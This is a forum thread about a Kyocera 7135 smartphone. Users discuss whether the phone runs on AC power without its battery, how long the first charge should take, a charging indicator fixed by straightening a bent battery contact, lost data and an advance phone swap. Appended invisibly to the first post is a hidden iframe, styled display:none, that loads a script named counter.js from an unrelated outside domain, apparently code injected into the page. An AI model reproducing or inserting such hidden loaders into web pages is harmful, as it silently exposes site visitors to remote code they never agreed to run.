+ Reply to Thread
Page 1 of 2 1 2 LastLast

Initial charge question...

I searched the forum, but didn't find the answer to this question... Will the phone work when plugged in even without the battery installed? I am trying to find out if I can play with the phone when I get it and install everything while just running on AC. Then, I can charge the battery when I go to bed. This way, I don't have to wait to play with it. Is there any reason not to do this?

Thanks,
    Mike<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Initial charge question...

Originally posted by mikelawr
    I searched the forum, but didn't find the answer to this question... Will the phone work when plugged in even without the battery installed? I am trying to find out if I can play with the phone when I get it and install everything while just running on AC. Then, I can charge the battery when I go to bed. This way, I don't have to wait to play with it. Is there any reason not to do this?

Thanks,
    Mike
    Yes, the phone will work while plugged in and charging or with the battery removed.

Alan

So (sorry for being dense) if you kept the battery in the phone and plugged in while checking the phone out the battery won't charge?

thanks

Originally posted by liltiki
    So (sorry for being dense) if you kept the battery in the phone and plugged in while checking the phone out the battery won't charge?

thanks
    I think it will charge, but I figure that for the initial charge, you shouldn't be using the phone. That's why I would keep it out at first, and just charge it when I'm not using the phone...

-Mike

Originally posted by liltiki

thanks
    Yes, the battery will still charge. It won't charge while on the phone talking or in a data call.

It's important to fully charge the battery before you play with the phone. The phone has an internal back up battery that sustains the items in memory should your regular battery die or you have some other disruption. The internal back up battery is kept charged by your regular battery and that is why you need to charge the battery fully before you play. Learned this the hard way.

Originally posted by spddare65
    It's important to fully charge the battery before you play with the phone. The phone has an internal back up battery that sustains the items in memory should your regular battery die or you have some other disruption. The internal back up battery is kept charged by your regular battery and that is why you need to charge the battery fully before you play. Learned this the hard way.
    But I assume that if the phone is plugged in when being used, and then shut off and put on the charger with the battery, it should be fine.

Thank goodness Markito is going to borrow me his spare battery for me to use when I get my 7135! Thanks Markito!
    iPhone therefore iAm.

Battery charging indicator always full

After doing a search (just for Alanb ) I found one guy had a similar problem as mine with his 6035. But no solution found. So here is mine:
    I got my 7135 today directly from Verizon through the B2B sales. Battery indicator said of course that the phone as only one bar battery. (Couldn't resist turning it one right when I got it). So I put it in the cradle to charge and the battery indicator on the phone immediatly displayed the battery icon filled in with all bars. Not the moving bars, but static full bars. After two hours I took it out of the cradle and it was still just on one bar. So back in the cradle. Then out, because I thought I plug it directly in the charging cord without cradle. Same thing: full battery indicator when plugged in.
    So I took the battery out and charged it directly in the cradle. 2 hours later it was green. Put it in the phone and indicator showed full battery that slowly went down during the day, just one bar though.

SO: I am NOT sure if that battery is actually able to be charged when in the phone. OR: am I too impatient?

Manual says that during charging the battery shows moving bars.

Any thoughts, ideas?

And yes... I did a soft reset.

Dagi

I apparently have a charger problem with a phone I've had since January. My phone will sometimes come off an overnight charge with less than a full charge according to the battery meter on Launcher X and even the bars on the phone side. In fact, it will sometimes come off being connected to a battery charger for a short time with less of a charge than it started with. On the other hand, if I charge the battery in the cradle slot, it will take a full charge. Kyo support seems to think it may be a problem with the phone's internal charger. They are going to do an advance phone swap.

Originally posted by Lnoble
    Kyo support seems to think it may be a problem with the phone's internal charger. They are going to do an advance phone swap.
    What is an advance phone swap? What do I need to do?

Dagi

You have to go through Kyo support. They will work through the problem and decide if they will authorize a repair/swap. In my case, they offered to let me send in the phone and they would repair or replace it and get it back to me in 5 business days. The other choice is an advance swap, where they Fed Ex you a new phone and you agree to ship the old phone so they get it back within 5 days of your receiving the new phone. The only catch is that you have to give them a credit card number and authorize a provisional charge of about $750 which goes through if you do not return the old phone to them with the stated time. I am doing it this way when I return from a trip next week.

Problem Solved

I played around iwth the phone a little bit more, took out the battery and noticed that one of the little golden tabs that connects the phone to the battery was bent. So..I carefully bent it the same way the other two are positioned, out the battery back in , put it in the cradle to charge and MAGIC. The chargin indicator (moving bars) worked.
    BUT: all the data on the phone was lost. Is that because I had the battery out for a while?

Dagi

Re: Problem Solved

Originally posted by Dagi
    BUT: all the data on the phone was lost. Is that because I had the battery out for a while?

Dagi
    That seems to be the consensus from what I've been reading around here. I don't know how long the data is kept without the battery in though (long enough to swap the spare battery at least, but beyond that I don't know).
    Please visit my picture site: Robert-O-Rama :)

DRC
    I usually plug the charger into the phone when changing the battery. Then nothing happens if I drop it, or something.
    Takes a while to reload everything, so this is worth the few seconds when I swap batteries.
    DRC

You need to TURN THE PHONE SIDE OFF before you remove the battery for any reason. Otherwise you may get an unwanted hard reset.

Also Kyo Tech support is now recommending that the initial charge of a new battery should not be done while the battery is inside the phone sitting in the cradle. Either slip the battery out and stick it in the slot in the back of your cradle, or, if you have a car charger, charge the battery (inside the phone) using the car charger.

And this might just be my superstition, but I recommend that you don't stop charging just as soon as the green "charged" light comes on. Instead let it charge a good 12 to 24 hours the first time.

Originally posted by jazmaan
    You need to TURN THE PHONE SIDE OFF before you remove the battery for any reason. Otherwise you may get an unwanted hard reset.

I have swapped without shutting anything off other than closing the flip. It was only out about 10 seconds and i didnt have it plugged in.

Last night I was on the phone and I just plugged in the charger, swapped the batteries and unplugged the charger-- no problems & I never lost the call.
    iPhone therefore iAm.

How long to charge on 1st charge

I just got it ..how long for the 1st charge?

I would say a minimum of 12 hours. Recommended 16 hours.
    Michael